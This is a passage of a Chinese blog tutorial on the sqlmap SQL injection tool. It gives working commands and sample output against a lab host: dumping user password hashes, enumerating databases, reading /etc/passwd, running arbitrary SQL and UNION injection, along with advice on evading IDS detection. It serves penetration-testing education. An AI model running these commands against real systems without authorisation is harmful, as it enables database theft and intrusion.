query SQL injection and, in such case, to use it to exploit the vulnerability; * It is possible to exclude system databases when enumerating tables, useful when dumping the entire DBMS databases tables entries and you want to skip the default DBMS data; * It is possible to view the Estimated time of arrival for each query output, updated in real time while performing the SQL injection attack; * Support to increase the verbosity level of output messages; * It is possible to save queries performed and their retrieved value in real time on an output text file and continue the injection resuming from such file in a second time; * PHP setting magic_quotes_gpc bypass by encoding every query string, between single quotes, with CHAR (or similar) DBMS specific function. 昨天晚上实在忍不住,还是看了一些,然后测试了一下。里面的sql语句太过于简单,不过你可以定制。修改为更富在的语句。以绕过注入检测和其他IDS设 备。 稍晚一下,我编译一个dos版本的给你们。 1、首先安装python2.5。 2、然后进入sqlmap的目录,执行sqlmap 详细用法 1、sqlmap -u 注入点 2、sqlmap -g "关键词“ //这是通过google搜索注入,现在还不可以,不知道是什么原因,可以直接修改为百度 3、 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 [hh:mm:25] [INFO] testing if the url is stable, wait a few seconds [hh:mm:26] [INFO] url is stable [hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic [hh:mm:26] [INFO] confirming that GET parameter 'id' is dynamic [hh:mm:26] [INFO] GET parameter 'id' is dynamic [hh:mm:26] [INFO] testing sql injection on GET parameter 'id' [hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter 'id' [hh:mm:26] [INFO] confirming numeric/unescaped injection on GET parameter 'id' [hh:mm:26] [INFO] GET parameter 'id' is numeric/unescaped injectable [hh:mm:26] [INFO] testing MySQL [hh:mm:26] [INFO] query: CONCAT('5', '5') [hh:mm:26] [INFO] retrieved: 55 [hh:mm:26] [INFO] performed 20 queries in 0 seconds [hh:mm:26] [INFO] confirming MySQL [hh:mm:26] [INFO] query: LENGTH('5') [hh:mm:26] [INFO] retrieved: 1 [hh:mm:26] [INFO] performed 13 queries in 0 seconds [hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1 [hh:mm:26] [INFO] retrieved: 5 [hh:mm:26] [INFO] performed 13 queries in 0 seconds remote DBMS: MySQL >= 5.0.0 4、指定参数注入 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "id" [hh:mm:17] [INFO] testing if the url is stable, wait a few seconds [hh:mm:18] [INFO] url is stable [hh:mm:18] [INFO] testing sql injection on parameter 'id' [hh:mm:18] [INFO] testing numeric/unescaped injection on parameter 'id' [hh:mm:18] [INFO] confirming numeric/unescaped injection on parameter 'id' [hh:mm:18] [INFO] parameter 'id' is numeric/unescaped injectable [...] Or if you want to provide more than one parameter, for instance: $ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "cat,id" 5、指定方法和post的数据 python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" -- data "id=1&cat=2" 6、指定cookie,可以注入一些需要登录的地址 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie "COOKIE_VALUE" 7、通过代理注入 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy "http://127.0.0.1:8118" 8、指定关键词,也可以不指定。程序会根据返回结果的hash自动判断 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string "STRING_ON_TRUE_PAGE" 9、指定数据,这样就不用猜测其他的数据库里。可以提高效率。 --remote-dbms 10、指纹判别数据库类型 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f 11、获取banner信息 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b banner: '5.0.38-Ubuntu_0ubuntu1.1-log' 12、获取当前数据库,当前用户,所有用户,密码,所有可用数据库。 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -- current-db current database: 'testdb' python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --users database management system users [5]: [*] 'debian-sys-maint'@'localhost' [*] 'root'@'127.0.0.1' [*] 'root'@'leboyer' [*] 'root'@'localhost' [*] 'testuser'@'localhost' python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -- passwords database management system users password hashes: [*] debian-sys-maint [1]: password hash: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [*] root [1]: password hash: *YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY [*] testuser [1]: password hash: *ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --dbs available databases [3]: [*] information_schema [*] mysql [*] testdb python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --tables -D "information_schema" Database: information_schema [16 tables] +---------------------------------------+ | CHARACTER_SETS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLLATIONS | | COLUMN_PRIVILEGES | | COLUMNS | | KEY_COLUMN_USAGE | | ROUTINES | | SCHEMA_PRIVILEGES | | SCHEMATA | | STATISTICS | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TABLES | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | +---------------------------------------+ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -- columns -T "user" -D "mysql" Database: mysql Table: user [37 columns] +-----------------------+------+ | Column | Type | +-----------------------+------+ | Alter_priv | enum | | Alter_routine_priv | enum | | Create_priv | enum | | Create_routine_priv | enum | | Create_tmp_table_priv | enum | | Create_user_priv | enum | | Create_view_priv | enum | | Delete_priv | enum | | Drop_priv | enum | | Execute_priv | enum | | File_priv | enum | | Grant_priv | enum | | Host | char | | Index_priv | enum | | Insert_priv | enum | | Lock_tables_priv | enum | | max_connections | int | | max_questions | int | | max_updates | int | | max_user_connections | int | | Password | char | | Process_priv | enum | | References_priv | enum | | Reload_priv | enum | | Repl_client_priv | enum | | Repl_slave_priv | enum | | Select_priv | enum | | Show_db_priv | enum | | Show_view_priv | enum | | Shutdown_priv | enum | | ssl_cipher | blob | | ssl_type | enum | | Super_priv | enum | | Update_priv | enum | | User | char | | x509_issuer | blob | | x509_subject | blob | +-----------------------+------+ 13、显示指定的文件内容,一般用于php python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --file / etc/passwd /etc/passwd: --- root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/false backup:x:34:34:backup:/var/backups:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false postgres:x:105:107:PostgreSQL administrator,,,:/var/lib/postgresql:/ bin/bash inquis:x:1000:100:Bernardo Damele,,,:/home/inquis:/bin/bash --- 14、执行你自己的sql语句。 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -e "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1" [hh:mm:18] [INFO] fetching expression output: 'SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1' [hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1 [hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY [hh:mm:19] [INFO] performed 118 queries in 0 seconds SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1: 'YYYYYYYYYYYYYYYY' 15、union注入 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --union- check valid union: 'http://192.168.1.47/page.php?id=1 UNION ALL SELECT NULL, NULL, NULL--&cat=2' python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -- union-use --banner [...] [hh:mm:24] [INFO] testing inband sql injection on parameter 'id' [hh:mm:24] [INFO] the target url could be affected by an inband sql injection vulnerability [hh:mm:24] [INFO] confirming inband sql injection on parameter 'id' [...] [hh:mm:24] [INFO] fetching banner [hh:mm:24] [INFO] request: http://192.168.1.47/page.php?id=1 UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(), CHAR(95,95,83,84,79,80,95,95)), NULL, NULL--&cat=2 [hh:mm:24] [INFO] performed 1 queries in 0 seconds banner: '5.0.38-Ubuntu_0ubuntu1.1-log' 16、保存注入过程到一个文件,还可以从文件恢复出注入过程,很方便,一大特色。你可以在注入的时候中断,有时间再继续。 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -b - o "sqlmap.log" [...] [hh:mm:09] [INFO] fetching banner [hh:mm:09] [INFO] query: VERSION() [hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log [hh:mm:11] [INFO] performed 139 queries in 1 seconds banner: '5.0.38-Ubuntu_0ubuntu1.1-log' python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -- banner -o "sqlmap.log" --resume [...] [hh:mm:13] [INFO] fetching banner [hh:mm:13] [INFO] query: VERSION() [hh:mm:13] [INFO] retrieved the length of query: 26 [hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb [hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log banner:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值